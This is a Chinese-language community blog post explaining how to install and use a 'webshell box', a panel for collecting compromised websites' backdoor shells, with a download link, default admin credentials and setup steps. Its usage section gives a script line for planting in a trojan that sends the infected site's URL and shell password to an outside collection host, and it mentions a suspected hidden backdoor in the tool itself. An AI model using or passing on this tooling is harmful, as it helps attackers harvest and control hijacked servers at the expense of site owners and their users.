【webshell箱子】webshell箱子 搭建过程,使用方法,附带所需的下载链接

举报
黑色地带(崛起) 发表于 2023/02/16 15:53:25 2023/02/16
【摘要】 【webshell箱子】webshell箱子 搭建过程,使用方法,附带所需的下载链接

【webshell箱子】webshell箱子 搭建过程,使用方法,附带所需的下载链接

目录

 

编辑webshell搭建

编辑错误过程:

编辑错误一: 

编辑错误二:

编辑错误三:

编辑正确搭建过程:

编辑第一步:软件下载

编辑第二步:放在网站目录下

编辑第三步:将asp服务器放在网站目录下

编辑第四步:打开webshell_box

编辑警示:

编辑使用方法:




编辑


编辑webshell搭建 

编辑错误过程:

编辑错误一: 

下载后直接将asp服务器(Sws)直接放在webshell_box文件里面

编辑





编辑错误二:

使用与asp服务器环境不相匹配的系统安装

编辑


编辑




编辑错误三:

错误打开方式,即使用打开其他网站一样的方式输入地址打开

编辑


编辑



编辑正确搭建过程:

编辑第一步:软件下载

链接:https://pan.baidu.com/s/1wlnQVd6wd0oEXvKjD7SnRw?pwd=hj12 
提取码:hj12

(内含webshellbox和asp服务器Sws)

Sws我测试的时候不支持win11(准确的说,是Sws支持win10以及以前的版本,毕竟已经老东西了)

如果不行就换小旋风等其他asp服务器试试

但是像我们这样的,应该会有虚拟机,我用我的win7搭建又搭建了一遍

(下一个phpstudy就可以了)

编辑

(我是没放后门的,自证清白,人在做天在看,举头三尺有神明) 

编辑


编辑第二步:放在网站目录下

 这个网站目录即phpstudy的www下

编辑



编辑第三步:将asp服务器放在网站目录下

 (这个要根据所下载的asp的服务器的使用方法确定)

Sws是这样用的,如果下其他的服务器,请参考一下说明

把这个复制粘贴到目录下

编辑



编辑第四步:打开webshell_box

在目录下,双击Sws2.3就可以直接在浏览器中打开了

然后先加载出来一个登录页面

账号:admin

密码:admin

编辑



编辑警示:

 点开系统设置的时候,有乱码,应该是被编码过

据我推测解码后会有后门

(我先声明不是我干的)

编辑


编辑


 编辑



编辑使用方法:

一般就是在小马里面制作后门,也就是调用了webshell箱子的api

(要认真学一下木马)

<script src=""http://xxx/api.aspurl="&server.URLEncode("""http://"&request.ServerVariables("HTTP_HOST")&request.ServerVariables("url"))&"&pass="&UserPass&"""></script>

(在网盘里面有)


下面2个实现获取当前网站的ip地址

&_SERVER["PHP_SELE"];正在执行的脚本文件名

$_SERVER["HTTP_HOST"];获取当前请求的host头部内容,即网站地址

编辑




编辑

 然后将小马到处……

然后会返回URL、密码、后门服务器


一般打开开发者模式,点击网络,查看有没有传向其他地址的数据包,查看有没有后门

【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。